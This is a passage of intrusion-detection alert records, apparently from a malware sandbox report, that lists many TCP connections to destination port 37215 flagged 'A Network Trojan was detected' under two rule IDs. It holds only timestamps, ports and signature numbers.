              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.566675
              SID:2829579
              Source Port:60284
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.124340
              SID:2829579
              Source Port:32908
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.301564
              SID:2829579
              Source Port:43426
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.244864
              SID:2829579
              Source Port:35358
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.028540
              SID:2835222
              Source Port:42846
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.675391
              SID:2829579
              Source Port:53332
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.607256
              SID:2835222
              Source Port:37586
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.174994
              SID:2829579
              Source Port:45166
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.223413
              SID:2835222
              Source Port:47046
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.888499
              SID:2835222
              Source Port:48656
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.424382
              SID:2829579
              Source Port:50860
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.401789
              SID:2835222
              Source Port:49070
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.754202
              SID:2835222
              Source Port:36034
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.989897
              SID:2829579
              Source Port:60468
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.014251
              SID:2835222
              Source Port:44372
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.128179
              SID:2835222
              Source Port:49080
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.679449
              SID:2829579
              Source Port:40026
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.093325
              SID:2835222
              Source Port:57560
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.989451
              SID:2829579
              Source Port:43122
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.212692
              SID:2829579
              Source Port:46692
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.042986
              SID:2835222
              Source Port:53146
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.197607
              SID:2835222
              Source Port:44928
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.546907
              SID:2835222
              Source Port:37622
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.416361
              SID:2829579
              Source Port:34378
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.656683
              SID:2829579
              Source Port:36232
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.246668
              SID:2835222
              Source Port:43588
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.457196
              SID:2829579
              Source Port:51838
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.123412
              SID:2835222
              Source Port:37294
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.487998
              SID:2829579
              Source Port:60512
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.453514
              SID:2829579
              Source Port:34828
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.450849
              SID:2835222
              Source Port:57054
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.296345
              SID:2829579
              Source Port:52856
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.757697
              SID:2835222
              Source Port:50746
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.508725
              SID:2835222
              Source Port:38926
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.971960
              SID:2829579
              Source Port:53942
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.610624
              SID:2835222
              Source Port:58892
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.297641
              SID:2829579
              Source Port:34818
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.914378
              SID:2835222
              Source Port:56086
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.011877
              SID:2829579
              Source Port:43534
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.222263
              SID:2835222
              Source Port:51038
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.632320
              SID:2829579
              Source Port:33142
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.508983
              SID:2835222
              Source Port:48700
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.571918
              SID:2835222
              Source Port:60672
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.546481
              SID:2835222
              Source Port:54536
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.212207
              SID:2835222
              Source Port:37466
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.176152
              SID:2835222
              Source Port:39250
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.402083
              SID:2835222
              Source Port:52238
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.453153
              SID:2835222
              Source Port:32898
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.504193
              SID:2835222
              Source Port:33340
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.155093
              SID:2829579
              Source Port:45792
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.805615
              SID:2835222
              Source Port:46860
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.231374
              SID:2829579
              Source Port:33794
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.240078
              SID:2829579
              Source Port:49630
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.805867
              SID:2829579
              Source Port:56464
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.126341
              SID:2835222
              Source Port:52594
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.912607
              SID:2835222
              Source Port:49798
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.130968
              SID:2835222
              Source Port:53462
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.801945
              SID:2835222
              Source Port:43088
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.502724
              SID:2829579
              Source Port:52424
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.154907
              SID:2829579
              Source Port:44718
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.258050
              SID:2835222
              Source Port:46088
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.344023
              SID:2829579
              Source Port:33460
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.978293
              SID:2829579
              Source Port:51316
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.307570
              SID:2829579
              Source Port:60264
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.545783
              SID:2829579
              Source Port:34838
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.359492
              SID:2835222
              Source Port:49372
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.632866
              SID:2829579
              Source Port:55208
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.937454
              SID:2829579
              Source Port:43788
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.174711
              SID:2829579
              Source Port:51092
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.176617
              SID:2835222
              Source Port:36964
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.298630
              SID:2835222
              Source Port:57884
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.418865
              SID:2829579
              Source Port:41274
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.017326
              SID:2835222
              Source Port:53656
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.101174
              SID:2835222
              Source Port:44456
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.754364
              SID:2835222
              Source Port:43756
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.453693
              SID:2835222
              Source Port:40982
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.306258
              SID:2829579
              Source Port:60272
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.277920
              SID:2829579
              Source Port:47686
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.237670
              SID:2835222
              Source Port:54984
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.046095
              SID:2835222
              Source Port:48872
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.134307
              SID:2835222
              Source Port:49734
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.503312
              SID:2829579
              Source Port:55714
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.844115
              SID:2835222
              Source Port:58554
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.785039
              SID:2835222
              Source Port:51252
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.172741
              SID:2829579
              Source Port:33852
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.786022
              SID:2829579
              Source Port:49926
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.301782
              SID:2829579
              Source Port:35440
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.349588
              SID:2835222
              Source Port:53036
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.677800
              SID:2829579
              Source Port:39896
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.708520
              SID:2829579
              Source Port:58126
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.401874
              SID:2829579
              Source Port:51194
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.232021
              SID:2829579
              Source Port:57342
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.936581
              SID:2835222
              Source Port:34758
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.073752
              SID:2835222
              Source Port:45194
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.657212
              SID:2829579
              Source Port:60074
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.678627
              SID:2829579
              Source Port:43612
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.154064
              SID:2835222
              Source Port:55428
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.711537
              SID:2829579
              Source Port:33504
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.572035
              SID:2835222
              Source Port:60030
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.971034
              SID:2829579
              Source Port:53004
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.265460
              SID:2829579
              Source Port:46086
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.552629
              SID:2835222
              Source Port:55166
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.630956
              SID:2835222
              Source Port:53690
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.836540
              SID:2829579
              Source Port:34936
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.975650
              SID:2829579
              Source Port:46986
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.822109
              SID:2829579
              Source Port:48098
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.633340
              SID:2835222
              Source Port:53362
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.404932
              SID:2835222
              Source Port:48084
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.258841
              SID:2829579
              Source Port:33770
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.910011
              SID:2829579
              Source Port:39502
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.302542
              SID:2829579
              Source Port:39892
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.130787
              SID:2835222
              Source Port:46402
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.274394
              SID:2829579
              Source Port:42474
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.194534
              SID:2835222
              Source Port:47184
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.837001
              SID:2829579
              Source Port:49752
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.657950
              SID:2835222
              Source Port:35378
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.274208
              SID:2835222
              Source Port:39998
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.417923
              SID:2835222
              Source Port:47972
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.176171
              SID:2829579
              Source Port:47690
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.215554
              SID:2835222
              Source Port:58104
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.213627
              SID:2829579
              Source Port:35040
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.218296
              SID:2835222
              Source Port:47146
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.223862
              SID:2829579
              Source Port:46198
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.294483
              SID:2835222
              Source Port:38572
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.089622
              SID:2829579
              Source Port:54888
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.276779
              SID:2829579
              Source Port:33726
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.247971
              SID:2829579
              Source Port:50232
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.572448
              SID:2835222
              Source Port:36948
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.988443
              SID:2835222
              Source Port:37434
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.276557
              SID:2829579
              Source Port:33810
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.377892
              SID:2829579
              Source Port:43530
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.417588
              SID:2835222
              Source Port:60296
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.013464
              SID:2835222
              Source Port:38652
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.242365
              SID:2835222
              Source Port:42462
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.711141
              SID:2835222
              Source Port:50950
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.221418
              SID:2829579
              Source Port:37294
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.836057
              SID:2835222
              Source Port:55354
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.315960
              SID:2829579
              Source Port:57948
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.075731
              SID:2829579
              Source Port:49422
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.271543
              SID:2835222
              Source Port:59956
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.942481
              SID:2835222
              Source Port:51184
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.027068
              SID:2829579
              Source Port:38962
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.868403
              SID:2835222
              Source Port:47000
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.199858
              SID:2829579
              Source Port:60044
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.757442
              SID:2835222
              Source Port:39816
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.273949
              SID:2829579
              Source Port:55146
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.605638
              SID:2829579
              Source Port:59866
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.195836
              SID:2835222
              Source Port:43546
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.675938
              SID:2835222
              Source Port:42602
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.173346
              SID:2835222
              Source Port:57688
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.100419
              SID:2835222
              Source Port:34824
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.674697
              SID:2835222
              Source Port:40890
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.089806
              SID:2835222
              Source Port:42698
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.567068
              SID:2835222
              Source Port:41796
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.089979
              SID:2829579
              Source Port:39676
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.478440
              SID:2835222
              Source Port:40236
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.268283
              SID:2829579
              Source Port:35044
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.272170
              SID:2835222
              Source Port:57574
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.610322
              SID:2835222
              Source Port:60508
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.656106
              SID:2829579
              Source Port:36752
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.610008
              SID:2829579
              Source Port:36816
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.611878
              SID:2835222
              Source Port:54566
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.804357
              SID:2835222
              Source Port:57790
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.041511
              SID:2835222
              Source Port:36980
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.376827
              SID:2835222
              Source Port:34450
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.912901
              SID:2829579
              Source Port:40624
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.553507
              SID:2835222
              Source Port:52030
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.227718
              SID:2835222
              Source Port:35476
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.613341
              SID:2829579
              Source Port:35716
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.804665
              SID:2829579
              Source Port:33484
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.638733
              SID:2829579
              Source Port:54410
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.694268
              SID:2835222
              Source Port:58326
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.755907
              SID:2829579
              Source Port:44948
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.839562
              SID:2835222
              Source Port:34284
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.528524
              SID:2829579
              Source Port:51998
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.485000
              SID:2835222
              Source Port:59520
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.753508
              SID:2835222
              Source Port:42008
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.223387
              SID:2829579
              Source Port:58286
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.709918
              SID:2835222
              Source Port:60304
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.322475
              SID:2829579
              Source Port:40452
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.040187
              SID:2829579
              Source Port:51470
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.041593
              SID:2835222
              Source Port:39906
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.725751
              SID:2835222
              Source Port:40004
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.802157
              SID:2835222
              Source Port:55460
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.076671
              SID:2835222
              Source Port:37866
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.821381
              SID:2835222
              Source Port:42768
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.180377
              SID:2829579
              Source Port:33356
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.659476
              SID:2835222
              Source Port:56784
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.160048
              SID:2829579
              Source Port:47844
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.339812
              SID:2829579
              Source Port:56142
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.223823
              SID:2835222
              Source Port:43028
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.155721
              SID:2835222
              Source Port:37272
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.373524
              SID:2829579
              Source Port:33342
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.439725
              SID:2835222
              Source Port:55680
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.025481
              SID:2829579
              Source Port:44438
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.730276
              SID:2835222
              Source Port:34916
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.244830
              SID:2829579
              Source Port:34862
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
